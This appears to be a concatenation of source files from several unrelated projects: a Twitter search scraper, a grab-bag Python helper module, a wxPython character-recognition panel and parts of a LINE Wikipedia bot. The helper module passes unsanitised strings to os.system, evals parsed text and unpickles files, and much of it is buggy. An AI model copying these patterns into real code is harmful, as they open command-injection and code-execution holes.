def get_user_id(username: str, proxy: str):
"""
get user id
"""
req = RequestHandler(user_agent="TIMELINE", ret="json")
if proxy:
req.proxy = proxy
url = APIV1_URL + username
res = req.get(url=url)
if res:
return res.get('user_id', '')
else:
return ''
def search(username: str = "", since: str = "", until: str = "", query: str = "", limit: int = 0, verified: bool = False, proxy: str = "", interval: int = 0):
"""Advanced search engine"""
cursor: str = "-1"
has_more: bool = True
result: list = []
req = RequestHandler(user_agent="TIMELINE", ret="json")
if proxy:
req.proxy = proxy
if since:
since = int(time.mktime(datetime.strptime(since, "%Y-%m-%d").timetuple()))
if until:
if len(until) == 4:
until = f"{until}-01-01"
query_structure = {
"from": f"+from:{username}",
"since": f"+since:{since}",
"verified": ":verified",
"until": f"+until:{until}",
"query": f"+{query}"
}
if username and query:
""" not allowed """
raise QueryError("`username` and `query` parameter not allowed together.")
if since and until:
""" not allowed """
raise QueryError("`since` and `until` parameter not allowed together.")
url = BASE_URL+TIMELINE_WITH_TOKEN_QUERY
url = url.replace("%TOKEN%", cursor)
# if there was username or query
if username or query:
if username:
url += query_structure['from']
else:
url += query_structure['query']
# if username and query aren't set properly raise error
else:
raise ParameterRequired("`username` or `query` required for search.")
if since or until:
if since:
url += query_structure['since']
elif until:
url += query_structure['until']
if verified:
url += query_structure['verified']
while has_more:
res = req.get(url=url)
if res:
cursor, has_more = extract_timeline_cursor(response=res)
if cursor:
extracted_tweets = extract_timeline(res['items_html'])
result.extend(extracted_tweets)
url = url.replace("%TOKEN%", cursor)
# check limitation
if limit > 0:
if len(result) > limit:
return result[:limit]
else:
sleep(interval)
continue
else:
break
sleep(interval)
else:
return result
return result
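# Illustrative usage (query values are made up):
# results = search(username="jack", since="2020-01-01", limit=50)
# results = search(query="python", verified=True, limit=50)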
```
#### File: twpy/serializers/__to_list.py
```python
def to_list(objects_list: list) -> list:
"""
Get objects and convert it to list
:param objects_list:
:return:
"""
try:
if objects_list[0].__class__.__name__ == "FF":
return [[obj.username, obj.avatar, obj.fullname] for obj in objects_list]
elif objects_list[0].__class__.__name__ == "Timeline":
return [[
obj.tweet_id,
obj.tweet_link,
obj.conversation_id,
obj.is_reply,
obj.has_parent,
obj.screen_name,
obj.user_id,
obj.user_mentions,
obj.content,
obj.reply_count,
obj.retweet_count,
obj.likes_count,
obj.created_at] for obj in objects_list]
elif objects_list[0].__class__.__name__ == "Profile":
return [[
obj.name,
obj.verified,
obj.protected,
obj.username,
obj.bio,
obj.location,
obj.url,
obj.joined_date,
obj.birthday,
obj.user_id,
obj.tweet_count,
obj.following_count,
obj.follower_count,
obj.likes_count
] for obj in objects_list]
except IndexError:
return []
``` |
{
"source": "0x0soir/tensorwine",
"score": 3
} |
#### File: src/char_recognition/extensions.py
```python
import io
import math
import sys
import inspect
import re
import os
import numpy as np
from random import randint
from random import random as _random
import shutil
py2 = sys.version < '3'
py3 = sys.version >= '3'
true = True
false = False
pi = math.pi
E = math.e
def Max(a, b):
if a > b:
return a
return b
def Min(a, b):
if a > b:
return b
return a
def rand(n=1): return _random() * n
def random(n=1): return _random() * n
def random_array(l): return np.random.rand(l) # (0,1) x,y don't work ->
def random_matrix(x, y): return np.random.rand(x, y) # (0,1) !
def pick(xs):
return xs[randint(0, len(xs) - 1)] # randint needs an inclusive (low, high) range
def readlines(source):
print("open(source).readlines()")
return map(str.strip, open(source).readlines())
def reverse(x):
y = x.reverse()
return y or x
def h(x):
help(x)
def log(msg):
print(msg)
def fold(self, x, fun):
if not callable(fun):
fun, x = x, fun
from functools import reduce # reduce moved to functools in py3
return reduce(fun, self, x)
def last(xs):
return xs[-1]
def Pow(x, y):
return x**y
def is_string(s):
return isinstance(s, str) or isinstance(s, xstr) or isinstance(s, unicode)
def flatten(l):
if isinstance(l, list) or isinstance(l, tuple):
for k in l:
if isinstance(k, list):
l.remove(k)
l.extend(k) # append(*k) raises TypeError unless len(k) == 1; extend splices the sublist
else:
return [l]
return l
def square(x):
if isinstance(x, list): return map(square, x)
return x * x
def puts(x):
print(x)
return x
def increase(x):
import nodes
if isinstance(x, nodes.Variable):
x.value = x.value + 1
return x.value
return x + 1
def grep(xs, x):
if isinstance(x, list):
return filter(lambda y: x[0] in str(y), xs)
return filter(lambda y: x in str(y), xs)
def ls(mypath="."):
from extensions import xlist
return xlist(os.listdir(mypath))
def length(self):
return len(self)
def say(x):
print(x)
os.system("say '%s'" % x)
def bash(x):
os.system(x)
def beep():
print("\aBEEP ")
def beep(bug=True):
print("\aBEEP ")
import context
if not context.testing:
import os
os.system("say 'beep'")
return 'beeped'
def match_path(p):
if not isinstance(p, str): return False
m = re.search(r'^(/[\w\'.]+)', p)
if not m: return []
return m
def regex_match(a, b):
NONE = "None"
match = regex_matches(a, b)
if match:
try:
return a[match.start():match.end()].strip()
except:
return b[match.start():match.end()].strip()
return NONE
MatchObjectType = type(re.search('', ''))
def typeof(x):
print("type(x)")
return type(x)
def regex_matches(a, b):
if isinstance(a, re._pattern_type):
return a.search(b) #
if isinstance(b, re._pattern_type):
return b.search(a)
if is_string(a) and len(a) > 0:
if a[0] == "/": return re.compile(a).search(b)
if is_string(b) and len(b) > 0:
if b[0] == "/": return re.compile(b).search(a)
try:
b = re.compile(b)
except:
print("FAILED: re.compile(%s)" % b)
b = re.compile(str(b))
print(a)
print(b)
return b.search(str(a)) # vs
def is_file(p, must_exist=True):
if not isinstance(p, str): return False
if re.search(r'^\d*\.\d+', p): return False
if re.match(r'^\d*\.\d+', str(p)): return False
m = re.search(r'^(\/[\w\'\.]+)', p)
m = m or re.search(r'^([\w\/\.]*\.\w+)', p)
if not m: return False
return must_exist and m and os.path.isfile(m.string) or m
def is_dir(x, must_exist=True):
m = match_path(x)
return must_exist and m and os.path.isdir(m[0]) # os.path.isdir exists on both py2 and py3; isdirectory does not
def is_a(self, clazz):
if self is clazz: return True
try:
ok = isinstance(self, clazz)
if ok: return True
except Exception as e:
print(e)
className = str(clazz).lower()
if className == str(self).lower(): return True # KINDA
if self.is_(clazz): return True
return False
if py3:
class file(io.IOBase):
pass # WTF python3 !?!?!?!?!??
class xrange: # WTF python3 !?!?!?!?!??
pass
class xstr(str):
pass # later
class unicode(xstr): # , bytes): # xchar[] TypeError: multiple bases have instance lay-out conflict
# Python 3 renamed the unicode type to str, the old str type has been replaced by bytes.
pass
else: # Python 2 needs:
class bytes(str):
pass
class char(str):
pass
# char = char
class byte(str):
pass
# byte= byte
file = file # nice trick: native py2 class or local py3 class
unicode = unicode
xrange = xrange
if py2:
import cPickle as pickle
else:
import dill as pickle
def type_name(x):
return type(x).__name__
def xx(y):
if type_name(y).startswith('x'): return y
if isinstance(y, xrange): return xlist(y)
if isinstance(y, bool): return y # xbool(y)
if isinstance(y, list): return xlist(y)
if isinstance(y, str): return xstr(y)
if isinstance(y, unicode): return xstr(y)
if isinstance(y, dict): return xdict(y)
if isinstance(y, float): return xfloat(y)
if isinstance(y, int): return xint(y)
if isinstance(y, file): return xfile(y)
if isinstance(y, char): return xchar(y)
if isinstance(y, byte): return xchar(y)
if py3 and isinstance(y, range): return xlist(y)
print("No extension for type %s" % type(y))
return y
extensionMap = {}
def extension(clazz):
try:
for base in clazz.__bases__:
extensionMap[base] = clazz
except:
pass
return clazz
class Class:
pass
@extension
class xfile(file):
path = ""
def name(self):
return self.path
def filename(self):
return self.path
def mv(self, to):
os.rename(self.path, to)
def move(self, to):
os.rename(self.path, to)
def copy(self, to):
shutil.copyfile(self.path, to)
def cp(self, to):
shutil.copyfile(self.path, to)
def contain(self, x):
return self.path.index(x)
def contains(self, x):
return self.path.index(x)
@staticmethod
def delete():
raise Exception("SecurityError: cannot delete files")
@staticmethod
def open(x): return open(x)
@staticmethod
def read(x): return open(x)
@staticmethod
def ls(mypath="."):
return xlist(os.listdir(mypath))
@extension
class File(xfile):
pass
@extension
class Directory(file):
@staticmethod # no cls parameter is declared, so this is really a static helper
def cd(path):
os.chdir(path)
def files(self):
os.listdir(str(self)) # ?
@staticmethod # no cls parameter is declared
def ls(path="."):
os.listdir(path)
@staticmethod # no cls parameter is declared
def files(path):
os.listdir(path)
def contains(self, x):
return self.files().has(x)
class Dir(Directory):
pass
class xdir(Directory):
pass
@extension
class xdict(dict):
def clone(self):
import copy
return copy.copy(self)
def contains(self, key):
return self.keys().contains(key)
class Class:
def wrap(self):
return str(self) # TODO!?
from functools import partial
@extension
class xlist(list):
def unique(xs):
return xlist(set(xs))
def uniq(xs):
return xlist(set(xs))
def add(self, x):
self.insert(len(self), x)
def method_missing(xs, name, *args, **kwargs): # [2.1,4.8].int=[2,5]
if len(xs) == 0: return None
try:
method = getattr(xs.first(), name)
except:
# if str(name) in globals():
method = globals()[str(name)] # .method(m)
if not callable(method):
properties = xlist(map(lambda x: getattr(x, name), xs))
return xlist(zip(xs, properties))
# return properties
return xlist(map(lambda x: method(*args, **kwargs), xs)) # unpack the args; method is bound to x
def pick(xs):
return xs[randint(0, len(xs) - 1)] # randint needs an inclusive (low, high) range
def __getattr__(self, name):
if str(name) in globals():
method = globals()[str(name)] # .method(m)
try:
return method(self)
except:
xlist(map(method, self))
return self.method_missing(name)
# return partial(self.method_missing, name)
def select(xs, func): # VS MAP!!
# return [x for x in xs if func(x)]
return filter(func, xs)
def map(xs, func):
return xlist(map(func, xs))
def last(xs):
return xs[-1]
def first(xs):
return xs[0]
def fold(self, x, fun):
if not callable(fun):
fun, x = x, fun
from functools import reduce # lists have no .reduce(); use functools.reduce
return reduce(fun, self, x)
def row(xs, n):
return xs[int(n) - 1]
def column(xs, n):
if isinstance(xs[0], str):
return xlist(map(lambda row: xstr(row).word(n + 1), xs))
if isinstance(xs[0], list):
return xlist(map(lambda row: row[n], xs))
raise Exception("column of %s undefined" % type(xs[0]))
# c=self[n]
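# Illustrative: xlist([[1, 2], [3, 4]]).column(0) -> [1, 3]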
def length(self):
return len(self)
def clone(self):
import copy
return copy.copy(self)
# return copy.deepcopy(self)
def flatten(self):
from itertools import chain
return list(chain.from_iterable(self))
def __gt__(self, other):
if not isinstance(other, list): other = [other]
return list.__gt__(self, other)
def __lt__(self, other):
if not isinstance(other, list): other = [other]
return list.__lt__(self, other)
# TypeError: unorderable types: int() < list() fucking python 3
# def __cmp__(self, other):
# if not isinstance(other, list): other = [other]
# return list.__cmp__(self, other)
def __sub__(self, other): # xlist-[1]-[2] minus
if not hasattr(other, '__iter__'): other = [other]
return xlist(i for i in self if i not in other)
def __rsub__(self, other): # [1]-xlist-[2] ok!
return xlist(i for i in other if i not in self)
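# Illustrative: xlist([1, 2, 3]) - [2] -> [1, 3]; [1, 2] - xlist([2]) -> [1]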
def c(self):
return xlist(map(str.c, self).join(", ")) # leave [] which is not compatible with C
def wrap(self):
# map(wrap).join(", ") # leave [] which is not compatible with C
return "rb_ary_new3(#{size}/*size*', #{wraps})" # values
def wraps(self):
return xlist(map(lambda x: x.wrap, self).join(", ")) # leave [] which is not compatible with C
def values(self):
return xlist(map(lambda x: x.value, self).join(", ")) # leave [] which is not compatible with C
def contains_a(self, type):
for a in self:
if isinstance(a, type): return True
return False
def drop(self, x):
return self.reject(x)
def to_s(self):
return self.join(", ")
# ifdef $auto_map:
# def method_missing(method, *args, block):
# if args.count==0: return self.map (lambda x: x.send(method ))
# if args.count>0: return self.map (lambda x: x.send(method, args) )
# super method, *args, block
# def matches(item):
# contains item
#
# remove: confusing!!
def matches(self, regex):
for i in self.flatten():
m = regex.match(i.gsub(r'([^\w])', "\\\\\\1")) # escape_token(i))
if m:
return m
return False
def And(self, x):
if not isinstance(x, list): x = [x] # wrap the scalar; the bare expression was discarded
return self + x
def plus(self, x):
if not isinstance(x, list): x = [x] # wrap the scalar; the bare expression was discarded
return self + x
# EVIL!!
# not def(self):
# None? not or
# def = x unexpected '=':
# is x
#
# def grep(x):
# select{|y|y.to_s.match(x)}
#
def names(self):
return xlist(map(str, self))
def rest(self, index=1):
return self[index:]
def fix_int(self, i):
if str(i) == "middle": i = self.count() / 2
if isinstance(i, Numeric): return i - 1
i = xstr(i).parse_integer()
return i - 1
def character(self, nr):
return self.item(nr)
def item(self, nr): # -1 AppleScript style !!! BUT list[0] !!!
return self[xlist(self).fix_int(nr)]
def word(self, nr): # -1 AppleScript style !!! BUT list[0] !!!):
return self[xlist(self).fix_int(nr)]
def invert(self): # ! Self modifying !
self.reverse()
return self
def get(self, x):
return self[self.index(x)]
# def row(self, n):
# return self.at(n)
def has(self, x):
return x in self # list.index raises ValueError when x is absent
def contains(self, x):
if x in self: # list.index raises ValueError when x is absent, so test membership first
return self[self.index(x)]
else:
return False
# def to_s:
# "["+join(", ")+"]"
#
# class TrueClass:
# not def(self):
# False
class FalseClass:
# not def(self):
# True
def wrap(self):
return self
def c(self):
return self
@extension
class xstr(str):
# @staticmethod
# def invert(self):
# r=reversed(self) #iterator!
# return "".join(r)
def invert(self):
r = reversed(self) # iterator!
self = "".join(r)
return self
def inverse(self):
r = reversed(self) # iterator!
return "".join(r)
def reverse(self):
r = reversed(self) # iterator!
return "".join(r)
def to_i(self):
return int(self)
# to_i=property(to_i1,to_i1)
def quoted(self):
return "%s" % self
# def c(self):
# return self.quoted()
# def id(self):
# return "id(%s)" % self
#
# def wrap(self):
# return "s(%s)" % self
# def value(self):
# return self # variable
# quoted
# def name(self):
# return self
def number(self):
return int(self)
def is_in(self, ary):
return ary.has(self)
def cut_to(self, pattern):
return self[:self.index(pattern)] # slice up to the pattern; sub/indexOf are not str methods
def matches(self, regex):
if isinstance(regex, list):
for x in regex:
if re.match(x, self):
return x
else:
return re.match(regex, self)
return False
def strip_newline(self):
return self.strip() # .sub(r';$', '')
def join(self, x):
return self + x
# def < x:
# i=x.is_a?Numeric
# if i:
# return int(self)<x
#
# super.< x
#
def starts_with(self, x):
# puts "WARNING: start_with? missspelled as starts_with?"
if isinstance(x, list):
for y in x:
if self.startswith(y): return y
return self.startswith(x)
# def show(self, x=None):
# print(x or self)
# return x or self
def contains(self, *things):
for t in flatten(things):
if self.find(t) != -1: return True # index() raises when absent and returns a falsy 0 for a prefix match; use find()
return False
def fix_int(self, i):
if str(i) == "middle": i = self.count / 2
if isinstance(i, int): return i - 1
i = xstr(i).parse_integer()
return i - 1
def sentence(self, i):
i = self.fix_int(i)
return self.split(r'[\.\?\!\;]')[i]
def paragraph(self, i):
i = self.fix_int(i)
return self.split("\n")[i]
def word(self, i):
i = self.fix_int(i)
replaced = self.replace("\t", " ").replace(" ", " ").replace("\t", " ").replace(" ", " ") # WTF
words = replaced.split(" ")
if i >= len(words): return self # be gentle
return words[i]
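# Illustrative (1-based, AppleScript style): xstr("hello brave world").word(2) -> "brave"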
def item(self, i):
return self.word(i)
def char(self, i):
return self.character(i)
def character(self, i):
i = self.fix_int(i)
return self[i:i + 1] # fix_int already converted to a 0-based index
def flip(self):
return self.split(" ").reverse.join(" ")
def plus(self, x):
return self + x
def _and(self, x):
return self + x
def add(self, x):
return self + x
def offset(self, x):
return self.index(x)
def __sub__(self, x):
return self.gsub(x, "")
# self[0:self.index(x)-1]+self[self.index(x)+x.length:-1]
def synsets(self, param):
pass
def is_noun(self): # expensive!!!):
# Sequel::InvalidOperation Invalid argument used for IS operator
return self.synsets('noun') or self.gsub(r's$', "").synsets('noun') # except False
def is_verb(self):
return self.synsets('verb') or self.gsub(r's$', "").synsets('verb')
def is_a(self, className): # the original omitted self, so className received the instance
className = className.lower()
if className == "quote": return True
return className == "string"
def is_adverb(self):
return self.synsets('adverb')
def is_adjective(self):
return self.synsets('adjective')
def examples(self):
return xlist(self.synsets.flatten.map('hyponyms').flatten().map('words').flatten.uniq.map('to_s'))
# def not_(self):
# return None or not
def lowercase(self):
return self.lower()
# def replace(self,param, param1):
# pass
def replaceAll(self, pattern, string):
return re.sub(pattern, string, self)
    def shift(self, n=1):
        return self[n:]  # drop the first n characters (strings are immutable)
def replace_numerals(self):
        x = self
        x = re.sub(r'([a-z])-([a-z])', r'\1+\2', x)  # e.g. "twenty-one" -> "twenty+one"
x = x.replace("last", "-1") # index trick
# x = x.replace("last", "0") # index trick
x = x.replace("first", "1") # index trick
x = x.replace("tenth", "10")
x = x.replace("ninth", "9")
x = x.replace("eighth", "8")
x = x.replace("seventh", "7")
x = x.replace("sixth", "6")
x = x.replace("fifth", "5")
x = x.replace("fourth", "4")
x = x.replace("third", "3")
x = x.replace("second", "2")
x = x.replace("first", "1")
x = x.replace("zero", "0")
x = x.replace("4th", "4")
x = x.replace("3rd", "3")
x = x.replace("2nd", "2")
x = x.replace("1st", "1")
x = x.replace("(\d+)th", "\\1")
x = x.replace("(\d+)rd", "\\1")
x = x.replace("(\d+)nd", "\\1")
x = x.replace("(\d+)st", "\\1")
x = x.replace("a couple of", "2")
x = x.replace("a dozen", "12")
x = x.replace("ten", "10")
x = x.replace("twenty", "20")
x = x.replace("thirty", "30")
x = x.replace("forty", "40")
x = x.replace("fifty", "50")
x = x.replace("sixty", "60")
x = x.replace("seventy", "70")
x = x.replace("eighty", "80")
x = x.replace("ninety", "90")
x = x.replace("ten", "10")
x = x.replace("eleven", "11")
x = x.replace("twelve", "12")
x = x.replace("thirteen", "13")
x = x.replace("fourteen", "14")
x = x.replace("fifteen", "15")
x = x.replace("sixteen", "16")
x = x.replace("seventeen", "17")
x = x.replace("eighteen", "18")
x = x.replace("nineteen", "19")
x = x.replace("ten", "10")
x = x.replace("nine", "9")
x = x.replace("eight", "8")
x = x.replace("seven", "7")
x = x.replace("six", "6")
x = x.replace("five", "5")
x = x.replace("four", "4")
x = x.replace("three", "3")
x = x.replace("two", "2")
x = x.replace("one", "1")
x = x.replace("dozen", "12")
x = x.replace("couple", "2")
# x = x.replace("½", "+.5");
x = x.replace("½", "+1/2.0");
x = x.replace("⅓", "+1/3.0");
x = x.replace("⅔", "+2/3.0");
x = x.replace("¼", "+.25");
x = x.replace("¼", "+1/4.0");
x = x.replace("¾", "+3/4.0");
x = x.replace("⅕", "+1/5.0");
x = x.replace("⅖", "+2/5.0");
x = x.replace("⅗", "+3/5.0");
x = x.replace("⅘", "+4/5.0");
x = x.replace("⅙", "+1/6.0");
x = x.replace("⅚", "+5/6.0");
x = x.replace("⅛", "+1/8.0");
x = x.replace("⅜", "+3/8.0");
x = x.replace("⅝", "+5/8.0");
x = x.replace("⅞", "+7/8.0");
x = x.replace(" hundred thousand", " 100000")
x = x.replace(" hundred", " 100")
x = x.replace(" thousand", " 1000")
x = x.replace(" million", " 1000000")
x = x.replace(" billion", " 1000000000")
x = x.replace("hundred thousand", "*100000")
x = x.replace("hundred ", "*100")
x = x.replace("thousand ", "*1000")
x = x.replace("million ", "*1000000")
x = x.replace("billion ", "*1000000000")
return x
    def parse_integer(self):
        n = self.replace_numerals()
        try:
            i = int(n)
        except ValueError:
            i = int(eval(str(n)))  # e.g. "20+1" -> 21 (same caveat as parse_number: eval is dangerous)
        return i
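    # Worked examples for the numeral helpers above (a sketch of expected output):
    #   xstr("third").parse_integer() -> 3    ("third" -> "3")
    #   xstr("2nd").parse_integer()   -> 2    ("2nd"   -> "2")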
def parse_number(self):
x = self.replace_numerals()
try:
x = float(x)
except:
x = eval(x) # !! danger!
if x == 0: return "0" # ZERO
return x
# def __sub__(self, other): # []= MISSING in python!!
# x="abc"
# >>> x[2]='a'
# TypeError: 'str' object does not support item assignment WTF
def reverse(self):
# return self[slice(start=None,stop=None,step=-1)]
return self[::-1] # very pythonic, It works by doing [begin:end:step]
# a slower approach is ''.join(reversed(s))
@staticmethod
def reverse_string(str):
return xstr(str).reverse()
class xchar(str):  # was `unicode` (Python 2); in Python 3, str is the unicode type
def __coerce__(self, other):
if isinstance(other, int):
other = chr(other)
# if isinstance(other,str):
# other=chr(other)
return type(other)(self), other
# class Fixnum Float
# class Numeric:
# @Extension(int)
@extension
class xint(int):
# operator.truth(obj)
# Return True if obj is true, and False otherwise. This is equivalent to using the bool constructor.
# operator.is_(a, b)
# Return a is b. Tests object identity.
# operator.is_not(a, b)
# Return a is not b. Tests object identity.
def __coerce__(self, other):
return int(other)
# def __cmp__(self, other):
# if isinstance(other, list): return list.__cmp__([self], other)
def c(self): # unwrap, for optimization):
return str(self) # "NUM2INT(#{self.to_s})"
def value(self):
return self
def wrap(self):
return "INT2NUM(#{self.to_s})"
def number(self):
return self
def _and(self, x):
return self + x
def plus(self, x):
return self + x
def minus(self, x):
return self - x
def times(self, x):
if callable(x):
            return [x() for i in range(self)]
else:
return self * x
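    # Usage sketch: with a callable, times() collects the results; with a number
    # it multiplies, e.g. xint(3).times(lambda: "hi") -> ['hi', 'hi', 'hi'] and
    # xint(3).times(2) -> 6.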
def times_do(self, fun):
x = None
for i in range(0, self):
x = fun()
return x
    def less(self, x):
        if isinstance(x, str): return self < int(x)
        return int.__lt__(self, x)
def is_blank(self):
return False
def is_a(self, clazz):
className = str(clazz).lower()
if className == "number": return True
if className == "real": return True
if className == "float": return True
# int = ALL : Fixnum = small int AND :. Bignum = big : 2 ** (1.size * 8 - 2)
if isinstance(self, int) and className == "integer": return True # todo move
if isinstance(self, int) and className == "int": return True
if className == str(self).lower(): return True # KINDA
        if isinstance(clazz, type) and isinstance(self, clazz): return True
return False
def add(self, x):
return self + x
def increase(self, by=1):
return self + by # Can't change the value of numeric self!!
def decrease(self, by=1):
return self - by # Can't change the value of numeric self!!
def bigger(self, x):
return self > x
def smaller(self, x):
return self < x
def to_the_power_of(self, x):
return self**x
def to_the(self, x):
return self**x
def logarithm(self):
return math.log(self)
def e(self):
return math.exp(self)
def exponential(self):
return math.exp(self)
def sine(self):
return math.sin(self)
def cosine(self):
return math.cos(self)
def root(self):
return math.sqrt(self)
def power(self, x):
return self**x
def square(self):
return self * self
# todo: use ^^
def squared(self):
return self * self
class Numeric(xint):
pass
class Integer(xint):
@classmethod
def __eq__(self, other):
if other == int: return True
if other == xint: return True
if other == Integer: return True
return False
@extension
class xfloat(float):
def to_i(self):
return int(self)
def c(self): # unwrap, for optimization):
return str(self) # "NUM2INT(#{self.to_s})"
def value(self):
return self
def number(self):
return self
def _and(self, x):
return self + x
def add(self, x):
return self + x
def plus(self, x):
return self + x
def minus(self, x):
return self - x
def times(self, x):
return self * x
    def less(self, x):
        if isinstance(x, str): return self < int(x)
        return float.__lt__(self, x)
def is_blank(self):
return False
def is_a(self, clazz):
className = str(clazz).lower()
if className == "number": return True
if className == "real": return True
if className == "float": return True
# int = ALL : Fixnum = small int AND :. Bignum = big : 2 ** (1.size * 8 - 2)
if isinstance(self, int) and className == "integer": return True # todo move
if isinstance(self, int) and className == "int": return True
if className == str(self).lower(): return True # KINDA
        if isinstance(clazz, type) and isinstance(self, clazz): return True
return False
def increase(self, by=1):
return self + by # Can't change the value of numeric self!!
def decrease(self, by=1):
return self - by # Can't change the value of numeric self!!
def bigger(self, x):
return self > x
def smaller(self, x):
return self < x
def is_bigger(self, x):
return self > x
def is_smaller(self, x):
return self < x
def to_the_power_of(self, x):
return self**x
def to_the(self, x):
return self**x
def logarithm(self):
return math.log(self)
def e(self):
return math.exp(self)
def exponential(self):
return math.exp(self)
def sine(self):
return math.sin(self)
def cosine(self):
return math.cos(self)
def root(self):
return math.sqrt(self)
def power(self, x):
return self**x
def square(self):
return self * self
# todo: use ^^
def squared(self):
return self * self
# if self==false: return True
# if self==True: return false
# class Enumerator
@extension # DANGER?
class xobject:
def __init__(selfy):
selfy.self = selfy
def value(self):
return self
def number(self):
return False
# not def(self):
# return False
def throw(self, x):
raise x
def type(self):
return self.__class__
def kind(self):
return self.__class__
def log(*x):
print(x)
def debug(*x):
print(x)
def is_a(self, clazz):
if self is clazz: return True
try:
ok = isinstance(self, clazz)
if ok: return True
except Exception as e:
print(e)
className = str(clazz).lower()
if className == str(self).lower(): return True # KINDA
if self.is_(clazz): return True
return False
def is_(self, x):
if not x and not self: return True
if x == self: return True
if x is self: return True
if str(x).lower() == str(self).lower(): return True # KINDA
if isinstance(self, list) and self.length == 1 and x.is_(self[0]): return True
if isinstance(x, list) and x.length == 1 and self.is_(x[0]): return True
return False
def load(file):
return open(file, 'rt').read()
def load_binary(file):
return open(file, 'rb').read()
def read(file):
return open(file, 'rt').read()
def readlines(file):
return open(file, 'rt').readlines()
def read_binary(file):
return open(file, 'rb').read()
def dump(o, file="dump.bin"):
pickle.dump(o, open(file, 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
print("saved to '" + file + "'")
save = dump
write = dump
def write_direct(data, file):
open(file, 'wb').write(data)
def load_pickle(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def unpickle(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def undump(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def restore(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def run(cmd):
os.system(cmd)
    def exists(file):
        return os.path.exists(file)
def find_in_module(module, match="", recursive=True):
if isinstance(module, str):
module = sys.modules[module]
for name, obj in inspect.getmembers(module):
# if inspect.isclass(obj):
if match in name:
print(obj)
if inspect.ismodule(obj) and recursive and obj != module:
if module.__name__ in obj.__name__:
find_in_module(obj, match)
def find_class(match=""):
import sys, inspect
for module in sys.modules.keys():
for name, obj in inspect.getmembers(sys.modules[module]):
if inspect.isclass(obj):
if match in str(obj):
print(obj)
print("[Extensions]: Cargado")
```
#### File: src/char_recognition/treePanel.py
```python
import wx
import numpy
import read_files as data
from PIL import Image
import letter
class MyTree(wx.TreeCtrl):
def __init__(self, parent, id, pos, size, style):
wx.TreeCtrl.__init__(self, parent, id, pos, size, style)
class TreePanel(wx.Panel):
def __init__(self, parent, panel, net):
wx.Panel.__init__(self, parent)
self.panel = panel
self.net = net
self.tree = MyTree(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TR_HAS_BUTTONS)
self.carpetas = []
self.nombres = []
self.ficheros = []
self.nombresFiles = []
self.Bind(wx.EVT_TREE_SEL_CHANGING, self.OnClick, self.tree)
self.root = self.tree.AddRoot('Images')
self.tree.Expand(self.root)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.tree, 1, wx.EXPAND)
self.SetSizer(sizer)
def OnClick(self, e):
try:
index = self.ficheros.index(e.GetItem())
self.panel.etiqueta.SetLabel(self.nombresFiles[index])
self.panel.ruta.SetLabel(data.files[index].dir)
l1, l2, l3, e1, e2, e3 = self.predict(data.files[index].dir)
self.panel.generada1.SetLabel(l1)
self.panel.generada2.SetLabel(l2)
self.panel.generada3.SetLabel(l3)
self.panel.error1.SetLabel(str(e1))
self.panel.error2.SetLabel(str(e2))
self.panel.error3.SetLabel(str(e3))
except ValueError:
value = False
def nuevaCarpeta(self, nombre):
self.carpetas.append(self.tree.AppendItem(self.root, nombre))
self.nombres.append(nombre)
def nuevoFichero(self, carpeta, fichero):
index = self.nombres.index(carpeta)
self.ficheros.append(self.tree.AppendItem(self.carpetas[index], fichero))
self.nombresFiles.append(fichero)
def predict(self, direction):
size = 24 # 24 pycharm font
image = Image.open(direction)
#print(image)
array = numpy.array(image.getdata()) # (1, 4000, 4)
mat = array.reshape(image.height, image.width, 4)[:, :, 0]
        if size > image.height:
            mat = numpy.pad(mat, (0, size - image.height), 'constant', constant_values=255)  # 1 == white!
mat = 1 - 2 * mat / 255.
try:
result = self.net.predict(mat)
            estimada = numpy.argmax(result)  # index of the top prediction (kept for reference)
            list_sort = numpy.argsort(result)
            size = len(list_sort[0][0])
            letra1 = chr(list_sort[0][0][size - 1] + letter.offset)
            letra2 = chr(list_sort[0][0][size - 2] + letter.offset)
            letra3 = chr(list_sort[0][0][size - 3] + letter.offset)
            error1 = result[0][0][size - 1]
            error2 = result[0][0][size - 2]
            error3 = result[0][0][size - 3]
return [letra1, letra2, letra3, error1, error2, error3]
except Exception as ex:
print("EX: %s"%ex)
``` |
{
"source": "0x0u/wikipedia_linebot",
"score": 3
} |
#### File: wikipedia_linebot/src/database.py
```python
from typing import Dict
from sqlalchemy import desc
from flask_sqlalchemy import BaseQuery
from src import db
from src.models import Users, Histories
def get_user(user_id: str) -> Users:
"""
DBからLINEのユーザーIDに基づくユーザー情報を取得する
Args:
user_id(str): LINEのユーザーID
Returns:
User: ユーザー情報
"""
user = db.session.query(Users).filter_by(user_id=user_id).first()
if not user:
user = Users()
user.user_id = user_id
db.session.add(user)
db.session.commit()
return user
def update_user(user_id: str, **kwargs: Dict) -> None:
"""
ユーザー情報の更新
Args:
user_id(str): LINEのユーザーID
kwargs: langかshow_urlをとる
"""
user = db.session.query(Users).filter_by(user_id=user_id).first()
if kwargs.get('lang'):
user.lang = kwargs['lang']
if kwargs.get('show_url') is not None:
user.show_url = kwargs['show_url']
db.session.add(user)
db.session.commit()
def add_history(user_id: str, word: str) -> None:
"""
履歴の追加
Args:
user_id(str): LINEのユーザーID
word(str): 検索結果のタイトル
"""
history = Histories()
history.user_id = user_id
history.history = word
db.session.add(history)
db.session.commit()
def get_history(user_id: str) -> BaseQuery:
"""
DBからLINEのユーザーIDに基づく検索履歴を最大13件取得する
Args:
user_id(str): LINEのユーザーID
Returns:
BaseQuery: 履歴
"""
return db.session.query(Histories).filter_by(user_id=user_id).order_by(desc(Histories.created_at)).limit(13)
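# Minimal usage sketch (assumes a Flask app context and a reachable DB; the
# user ID below is hypothetical):
#
#   user = get_user('U0123456789abcdef')
#   update_user(user.user_id, lang='en', show_url=True)
#   add_history(user.user_id, 'Python (programming language)')
#   for h in get_history(user.user_id):
#       print(h.history)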
```
#### File: wikipedia_linebot/src/views.py
```python
from flask import request, abort
from linebot.exceptions import (InvalidSignatureError)
from linebot.models import (MessageEvent, TextMessage)
from src import app, handler, line
from src.message import create_reply_content
@app.route('/', methods=['GET'])
def route():
return 'ok'
@app.route('/callback', methods=['POST'])
def callback():
signature = request.headers['X-Line-Signature']
body = request.get_data(as_text=True)
